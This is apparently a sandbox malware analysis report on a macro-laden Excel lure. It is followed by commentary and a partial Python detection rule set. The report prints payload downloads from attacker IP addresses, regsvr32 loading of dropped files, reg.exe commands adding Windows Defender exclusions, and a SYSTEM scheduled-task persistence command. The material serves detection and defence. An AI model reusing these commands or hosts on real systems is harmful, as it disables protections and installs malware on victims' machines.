Windows Analysis Report Compensation-1730406737-09272021.xls

Overview

General Information

Sample Name: Compensation-1730406737-09272021.xls
Analysis ID: 491509
MD5: b4b3a2223765ac84c9b1b05dbf7c6503
SHA1: 57bc35cb0c7a9ac6e7fcb5dea5c211fe5eda5fe0
SHA256: 3982ae3e61a6ba86d61bd8f017f6238cc9afeb08b785010d686716e8415b6a36

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
PE file has nameless sections
Sigma detected: Regsvr32 Command Line Without DLL
Machine Learning detection for dropped file
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[3].dat Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[1].dat Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[2].dat Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: amstream.pdb source: explorer.exe, 00000005.00000003.422309790.00000000027B1000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000AEB4 FindFirstFileW,FindNextFileW, 4_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0008AEB4 FindFirstFileW,FindNextFileW, 5_2_0008AEB4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_1000AEB4 FindFirstFileW,FindNextFileW, 8_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_0008AEB4 FindFirstFileW,FindNextFileW, 10_2_0008AEB4

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: 44466.7022844907[1].dat.0.dr
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 190.14.37.178:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 190.14.37.178:80

Networking:

Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 14:51:09 GMTContent-Type: application/octet-streamContent-Length: 387072Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44466.7022844907.dat"
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 14:51:11 GMTContent-Type: application/octet-streamContent-Length: 387072Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44466.7022844907.dat"
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 14:51:12 GMTContent-Type: application/octet-streamContent-Length: 387072Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44466.7022844907.dat"
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /44466.7022844907.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.178Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44466.7022844907.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.183.96.67Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44466.7022844907.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.250.148.213Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: regsvr32.exe, 00000004.00000002.421225157.0000000001FC0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.705650290.00000000023C0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.431427625.0000000002200000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.422807773.0000000001D20000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.420832394.0000000001BC0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.433067223.0000000001CC0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.430171202.0000000000950000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000004.00000002.421225157.0000000001FC0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.705650290.00000000023C0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.431427625.0000000002200000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000002.433161953.0000000002190000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[1].dat

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing" in the yellow bar 19 above. 20 example of notification 22 ( 0 pRoTEcTmwARNNG This
Source: Screenshot number: 4 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the 26 docume
Source: Screenshot number: 4 Screenshot OCR: Enable Macros ) 30 31 32 :: Why I can not open this document? 35 36 - You are using iOS or And
Source: Document image extraction number: 0 Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This file o
Source: Document image extraction number: 0 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 0 Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Source: Document image extraction number: 1 Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcTmwARNNG Thisfileorigi
Source: Document image extraction number: 1 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 1 Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[3].dat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd1.red
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[1].dat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd.red
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd2.red
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[2].dat
PE file has nameless sections
Source: 44466.7022844907[1].dat.0.dr Static PE information: section name:
Source: 44466.7022844907[1].dat.0.dr Static PE information: section name:
Source: 44466.7022844907[1].dat.0.dr Static PE information: section name:
Source: Drezd.red.0.dr Static PE information: section name:
Source: Drezd.red.0.dr Static PE information: section name:
Source: Drezd.red.0.dr Static PE information: section name:
Source: 44466.7022844907[2].dat.0.dr Static PE information: section name:
Source: 44466.7022844907[2].dat.0.dr Static PE information: section name:
Source: 44466.7022844907[2].dat.0.dr Static PE information: section name:
Source: Drezd1.red.0.dr Static PE information: section name:
Source: Drezd1.red.0.dr Static PE information: section name:
Source: Drezd1.red.0.dr Static PE information: section name:
Source: 44466.7022844907[3].dat.0.dr Static PE information: section name:
Source: 44466.7022844907[3].dat.0.dr Static PE information: section name:
Source: 44466.7022844907[3].dat.0.dr Static PE information: section name:
Source: Drezd2.red.0.dr Static PE information: section name:
Source: Drezd2.red.0.dr Static PE information: section name:
Source: Drezd2.red.0.dr Static PE information: section name:
Source: Drezd.red.5.dr Static PE information: section name:
Source: Drezd.red.5.dr Static PE information: section name:
Source: Drezd.red.5.dr Static PE information: section name:
Source: Drezd1.red.10.dr Static PE information: section name:
Source: Drezd1.red.10.dr Static PE information: section name:
Source: Drezd1.red.10.dr Static PE information: section name:
Source: Drezd.red.15.dr Static PE information: section name:
Source: Drezd.red.15.dr Static PE information: section name:
Source: Drezd.red.15.dr Static PE information: section name:
Source: Drezd2.red.17.dr Static PE information: section name:
Source: Drezd2.red.17.dr Static PE information: section name:
Source: Drezd2.red.17.dr Static PE information: section name:
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02833726 4_2_02833726
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831424 4_2_02831424
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0283242A 4_2_0283242A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02832C41 4_2_02832C41
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831000 4_2_02831000
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831D89 4_2_02831D89
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02834495 4_2_02834495
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0283B114 4_2_0283B114
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831827 4_2_02831827
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_028334DA 4_2_028334DA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831C5D 4_2_02831C5D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02834162 4_2_02834162
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_028332EB 4_2_028332EB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02833073 4_2_02833073
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_10016EB0 4_2_10016EB0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_10012346 4_2_10012346
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_10011758 4_2_10011758
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_10014FC0 4_2_10014FC0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00096EB0 5_2_00096EB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00092346 5_2_00092346
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00091758 5_2_00091758
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00094FC0 5_2_00094FC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D82C41 8_2_00D82C41
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D8242A 8_2_00D8242A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D81424 8_2_00D81424
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D83726 8_2_00D83726
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D834DA 8_2_00D834DA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D81C5D 8_2_00D81C5D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D83073 8_2_00D83073
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D832EB 8_2_00D832EB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D84162 8_2_00D84162
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D8B114 8_2_00D8B114
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D84495 8_2_00D84495
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D81D89 8_2_00D81D89
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D81000 8_2_00D81000
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D81827 8_2_00D81827
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_10016EB0 8_2_10016EB0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_10012346 8_2_10012346
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_10011758 8_2_10011758
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_10014FC0 8_2_10014FC0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_00096EB0 10_2_00096EB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_00092346 10_2_00092346
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_00091758 10_2_00091758
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_00094FC0 10_2_00094FC0
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Compensation-1730406737-09272021.xls OLE, VBA macro line: Sub auto_open()
Source: Compensation-1730406737-09272021.xls OLE, VBA macro line: Sub auto_close()
Source: Compensation-1730406737-09272021.xls OLE, VBA macro line: Private m_openAlreadyRan As Boolean
Source: Compensation-1730406737-09272021.xls OLE, VBA macro line: Private Sub saWorkbook_Opensa()
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose, 4_2_1000C6C0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary, 4_2_1000CB77
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose, 8_2_1000C6C0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary, 8_2_1000CB77
PE file does not import any functions
Source: Drezd.red.5.dr Static PE information: No import functions for PE file found
Source: Drezd1.red.10.dr Static PE information: No import functions for PE file found
Source: Drezd2.red.17.dr Static PE information: No import functions for PE file found
Source: Drezd.red.15.dr Static PE information: No import functions for PE file found
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Djryxcyvgoe' /d '0'
Document contains embedded VBA macros
Source: Compensation-1730406737-09272021.xls OLE indicator, VBA macros: true
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ....................D.-..........&W.....(.P.............................U.................................................................-..... Jump to behavior
Source: C:\Windows\System32\reg.exe Console Write (UTF-16LE buffer, decoded): The operation completed successfully Jump to behavior
Source: C:\Windows\System32\reg.exe Console Write (UTF-16LE buffer, decoded): The operation completed successfully Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd1.red
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd2.red
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Djryxcyvgoe' /d '0'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Benqxuam' /d '0'
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd1.red Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd2.red Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Djryxcyvgoe' /d '0' Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Benqxuam' /d '0' Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red' Jump to behavior
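The process chain above is the part of this report a detection engineer cares about: EXCEL.EXE spawning regsvr32.exe with a non-DLL argument (..\Drezd.red), 64-bit regsvr32.exe re-launching its SysWOW64 copy, that copy spawning explorer.exe, and explorer.exe then running reg.exe to add two Windows Defender path exclusions and schtasks.exe to schedule regsvr32.exe under NT AUTHORITY\SYSTEM. Those are the events the Sigma matches in the signature list (Microsoft Office Product Spawning Windows Shell, Regsvr32 Command Line Without DLL, Schedule system process) key on. What follows is an added example, not part of the sandbox report and not the Sigma rules themselves: a small Python rule set in the same spirit, with rule names, process lists and thresholds that are my own, evaluated over five of the report's own "Process created" lines embedded as sample input. One caveat: the reg.exe write goes under HKLM, which needs an elevated token, so the exclusion step only succeeds when the chain runs with administrative rights; the two "The operation completed successfully" console writes show that it did in this sandbox run, and the GetTokenInformation privilege check the report lists further down is consistent with the malware testing for that before trying.

```python
import re

# Sample input: five "Process created" lines copied from the sandbox report above.
SAMPLE_EVENTS = r"""
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Djryxcyvgoe' /d '0'
""".strip().splitlines()

# "Source: <parent image> Process created: <child image> <command line>"
EVENT_RE = re.compile(r"^Source: (.+?) Process created: (.+?\.exe)(?: (.*))?$", re.IGNORECASE)

# Process lists are my own choice for this example, not copied from any Sigma rule.
OFFICE_HOSTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe", "cscript.exe",
           "cmd.exe", "powershell.exe", "certutil.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse_event(line):
    """Split a report line into parent image, child image and child command line."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    return {"parent": m.group(1), "image": m.group(2), "cmdline": m.group(3) or ""}


def rule_office_spawns_lolbin(ev):
    return basename(ev["parent"]) in OFFICE_HOSTS and basename(ev["image"]) in LOLBINS


def rule_regsvr32_without_dll(ev):
    # regsvr32 normally registers a .dll; a payload renamed to .red (as here) has no .dll in its arguments
    return (basename(ev["image"]) == "regsvr32.exe"
            and bool(ev["cmdline"])
            and ".dll" not in ev["cmdline"].lower())


def rule_regsvr32_spawns_explorer(ev):
    # a COM-registration helper has no business starting explorer.exe; this run used it as an injection host
    return basename(ev["parent"]) == "regsvr32.exe" and basename(ev["image"]) == "explorer.exe"


def rule_defender_exclusion_via_reg(ev):
    c = ev["cmdline"].lower()
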